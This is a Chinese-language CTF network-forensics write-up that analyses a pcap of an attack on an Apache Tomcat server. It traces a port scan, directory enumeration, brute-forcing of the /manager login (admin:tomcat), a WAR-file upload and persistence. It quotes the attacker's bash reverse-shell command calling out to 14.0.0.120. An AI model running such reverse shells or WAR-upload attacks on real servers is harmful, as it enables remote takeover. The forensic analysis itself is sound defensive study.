网络取证-Tomcat-简单

题干:

我们的 SOC 团队在公司内部网的一台 Web 服务器上检测到可疑活动。为了更深入地了解情况,团队捕获了网络流量进行分析。此 pcap 文件可能包含一系列恶意活动,这些活动已导致 Apache Tomcat Web 服务器遭到破坏。我们需要进一步调查这一事件。

鉴于在 Web 服务器上检测到的可疑活动,pcap数据包显示服务存在跨端口请求,这表明存在潜在的扫描行为。您能否确定在我们的服务器上发起这些请求的源 IP 地址?

使用wireshark工具直接打开下载好的pcap数据包,然后根据端口大小进行排序,我们发现14.0.0.120 对 10.0.0.112 设备从23端口开始进行递归探测
在这里插入图片描述
所以此题的答案为14.0.0.120

根据与攻击者关联的已识别 IP 地址,您能否确定攻击者活动起源于哪个城市?

因为这个题目是歪果仁出的,所以不建议使用国内的ip地址查询,使用国外的,否则答案就是错的
在这里插入图片描述

Pcap数据包中的端口中的哪一个提供对 Web 服务器管理面板的访问?在这里插入图片描述

很显然,真相只有一个,那就是8080

攻击者在我们的服务器上发现开放端口后,似乎试图枚举我们 Web 服务器上的目录和文件。您可以从分析中识别出攻击者使用的工具是什么吗?

竟然是枚举目录,那我们直接找404
在这里插入图片描述
随便选一个,进行http追踪
在这里插入图片描述
特征已经很明显了,虽然不知道这个工具是啥,但是确定就是他了
在这里插入图片描述

在他们枚举 Web 服务器上的目录之后,攻击者发出了大量请求,试图识别管理界面。攻击者发现了与管理面板关联的哪个特定目录?

这道题其实承上启下,人家问的是与管理面板关联的目录,所以我们不能光看200请求码,还需要看有登录标识的
在这里插入图片描述
很显然,是manager

访问管理面板后,攻击者试图暴力破解登录凭据。从数据中,您能否识别出攻击者成功用于授权的正确用户名和密码组合?

直接找到最后一个401的下一个数据包就行
在这里插入图片描述
追踪流
在这里插入图片描述
YWRtaW46dG9tY2F0
使用葵爷进行base64解码
在这里插入图片描述

进入管理面板,攻击者试图上传文件,意图建立反向 shell。您能从捕获的数据中识别出此恶意文件的名称吗?

直接找上传数据包
在这里插入图片描述
追踪流
在这里插入图片描述
好好好,war包上传getshell是吧
JXQOZY.war

在我们的服务器上成功建立反向 shell 后,攻击者旨在确保受感染机器上的持久性。从分析中,您能否确定它们计划运行的特定命令是什么吗?

这里就不能追踪http请求了,我们需要回到最初始的状态,直接找getshell成功后,第一次访问这个shell的后面的数据包
在这里插入图片描述
为啥看这个呢,因为8080war包上传后最后通过shell控制的当然还是80端口
在这里插入图片描述
结果显而易见
/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’

so easy

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/129261.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

若依笔记(四):代码生成器

已知使用MyBatisPlus代码生成器可以自动生成Entity、Mapper、Service、Controller代码,前提是数据库中有数据表,生成pojo类以及对于该数据表的增删改查命令的代码,若依更进一步能选择表后生成代码、预览、下载,同时可以生产前端代…

【equals比较方法 和 内部类】

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言对象比较equals方法内部类实例内部类静态内部类总结 前言 对象比较equals方法 三种比较相等方法: 第一种,如果两侧是基本数据类型&…

使用 C# 在Word中插入图表

Word中的图表功能将数据可视化地呈现在文档中。这为展示数据和进行数据分析提供了一种方便且易于使用的工具,使作者能够以直观的方式传达信息。要通过C#代码来实现在Word中绘制图表,可以借助 Spire.Doc for .NET 控件,具体操作参考下文。 目录…

关于GLibC

查看使用的编译器依赖glibc库位置: gcc --print-file-namelibc.a gcc --print-file-namelibc.so

Qt扫盲-QFont理论总结

QFont 理论总结 一、概述二、使用三、字体匹配算法 一、概述 QFont类指定用于绘制文本的时候来描述字体的工具类。QFont可以看作是对系统上一个或多个字体的查询。 当我们创建QFont对象时,我们可以指定希望字体具有的各种属性。Qt将使用具有指定属性的字体&#x…

初学Redis简介以及入门

🏅我是默,一个在CSDN分享笔记的博主。📚📚 ​ 🌟在这里,我要推荐给大家我的专栏《Linux》。🎯🎯 🚀无论你是编程小白,还是有一定基础的程序员,这…

详解Java经典数据结构——HashMap

Java 的 HashMap 是一个常用的基于哈希表的数据结构,它实现了 Map 接口,可以存储键值对。下面我们进行详细介绍: 基本结构:HashMap 底层是基于哈希表来实现的,每次插入一个键值对时,会先对该键进行 Hash 运…

ARM传输数据以及移位操作

3.2.2 数据传送指令 LDR/STR指令用来在寄存器和内存之间输送数据。如果我们想要在寄存器之间传送数据,则可以使用MOV指令。MOV指令的格式如下。 MOV {cond} {s}Rd, oprand2 MOV {cond} {s}Rd, oprand2 其中,{cond}为条件指令可选项,{s}用来表…

Android Studio创建项目后Gradle(构建)项目很慢问题解决

Android Studio创建项目后Gradle(构建)项目很慢问题解决 在使用Android Studio创建项目时,会自动从网上下载相关依赖。由于是访问国外服务器,会出现构建项目时下载依赖很慢的问题。为了解决该问题,需要在settings.gradle(或者settings.gradl…

Android 交叉编译openssl 、libxml2静态库

openssl: Android下openssl编译和使用(一)_安卓编译openssl 交叉编译 for arch in armeabi-v7a arm64-v8a-CSDN博客 libxml2: LIBXML2 2.9.11 build for Android_libxml2 android静态库_fredhurui的博客-CSDN博客

EthernetIP主站转EtherCAT协议网关采集电力变压器的 Ethernet IP 数据

怎么通过捷米JM-EIPM-ECT网关把ABB电力变压器的 Ethernet IP 数据,连接到欧姆龙PLC上,通过plc去监控电力设备的数据呢,下面是介绍简单的连接方法,采集Ethernet IP从站数据和EtherCAT协议 1 ,捷米JM-EIPM-ECT网关连接Et…

11.3 知识总结(jQuery入门)

一、 jQuery入门 1.1 介绍 jQuery是一个轻量级的、兼容多浏览器的JavaScript库。jQuery使用户能够更方便地处理HTML Document、Events、实现动画效果、方便地进行Ajax交互,能够极大地简化JavaScript编程。它的宗旨就是:“Write less, do more.“ 1.2 优…

C#开源的一个能利用Windows通知栏背单词的软件 - ToastFish

前言 今天给大家推荐一个C#开源且免费的能利用Windows通知栏背单词的软件,可以让你在上班、上课等恶劣环境下安全隐蔽地背单词(利用摸鱼时间背单词的软件):ToastFish。 操作系统要求 目前该软件只支持Windows10及以上系统&…

纷享销客荣获最佳制造业数字营销服务商奖

2023年10月26日,第二届中国制造业数智化发展大会在上海盛大召开。本次大会汇聚了制造行业的顶尖企业和专家,共同探讨如何通过数字化转型赋能企业自身成长,实现信息化向数字化的升级转型。 在本次盛会上,纷享销客以其卓越的基本面、…

EasyFlash移植使用- 关于单片机 BootLoader和APP均使用的情况

目前,我的STM32单片机,需要在BootLoader和APP均移植使用EasyFlash,用于参数管理和IAP升级使用。 但是由于Flash和RAM限制,减少Flash占用,我规划如下: BootLoader中移植EasyFlash使用旧版本,因为…

centos7-lamp

目录 一、安装 1.关闭防火墙关闭selinux 2.安装apache 3.配置主页 二、部署mariadb(mysql) 1.用yum安装 2.启动数据库 3.看下端口是否listen 4登录mysql 5.修改下密码 三、安装php 1.安装依赖包 2.安装php解释器和php连接mysql驱动 3.配置…

GPT引发智能AI时代潮流

最近GPT概念爆火,许多行业开始竞相发展AI ,工作就业也将面临跳转,目前测试就业形势就分为了两大类,一类是测试行业如功能、性能、自动化综合性人才就业技能需求,另一类便是AI测试行业的需求普遍增长,原本由…

linux 上flink单机安装详解

目录 一 准备安装包 二 解压 三 配置环境变量 四 验证是否部署成功 一 准备安装包 官网地址: Downloads | Apache Flink 百度网盘资源: 链接: https://pan.baidu.com/s/15aXmF3JLxnOlPiDxId637Q?pwdsqsx 提取码: sqsx 这里准备的版本是flink1.13…

C语言实现 1.在一个二维数组中形成 n 阶矩阵,2.去掉靠边元素,生成新的 n-2 阶矩阵;3.求矩阵主对角线下元素之和:4.以方阵形式输出数组。

矩阵形式: 1 1 1 1 1 2 1 1 1 1 3 2 1 1 1 4 3 2 1 1 5 4 3 2 1 完整代码: /*编写以下函数 1.在一个二维数组中形成如以下形式的 n 阶矩阵: 1 1 1 1 1 2 1 1 1 1 3 2 1 1 1 4 3 2 1 1 5 4 3 2 1 2.去掉…

快速入手maven

文章目录 Maven介绍Maven安装和配置基于IDEA的Maven工程创建梳理Maven工程GAVP属性Idea构建Maven JavaSE工程Idea构建Maven JavaEE工程1. 手动创建2. 插件方式创建 Maven工程项目结构说明Maven核心功能依赖和构建管理依赖传递和冲突依赖导入失败场景和解决方案扩展构建管理和插…